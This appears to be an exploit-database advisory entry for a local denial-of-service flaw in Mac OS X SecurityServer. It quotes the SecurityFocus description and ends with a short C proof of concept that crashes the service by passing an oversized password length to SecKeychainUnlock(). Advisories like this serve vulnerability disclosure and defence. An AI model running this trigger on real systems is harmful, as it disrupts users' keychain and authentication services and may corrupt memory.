Apple MacOS X SecurityServer Denial of Service Vulnerability

vendor:

MacOS X SecurityServer

by:

Unknown

7.5

CVSS

HIGH

Denial of Service

CWE

Product Name: MacOS X SecurityServer

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: CVE-2003-0609

CPE: o:apple:mac_os_x

Metasploit:

Other Scripts:

Platforms Tested: MacOS X

Unknown

Apple MacOS X SecurityServer Denial of Service Vulnerability

The vulnerability allows a local user to cause a denial of service (DoS) condition on the target system. This can be achieved by specifying a large password for a SecKeychainUnlock() call. The SecurityServer crashes during a memory copy operation, potentially leading to memory corruption. Although unconfirmed, this could potentially allow for the execution of arbitrary code.

Mitigation:

No known mitigation or remediation for this vulnerability.

Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/9332/info

Apple MacOS X SecurityServer has been reported prone to a denial of service vulnerability that may be triggered by a local user. The issue may be triggered under certain circumstances when a large password for a SecKeychainUnlock() call is specified under certain circumstances.

It has been reported that this activity will cause the SecurityServer to crash. The server appears to crash during a memory copy operation, potentially resulting in memory corruption. This could possibly allow for execution of arbitrary code, though this possibility has not been confirmed. 

#include <Security/Security.h>
int main(int argc, const char *argv[])
{
    SecKeychainRef defaultKeychain;
    SecKeychainCopyDefault(&defaultKeychain);
    SecKeychainLock(defaultKeychain);
    SecKeychainUnlock(defaultKeychain, 0xFFFFFFFF, "password", true);
    return 0;
}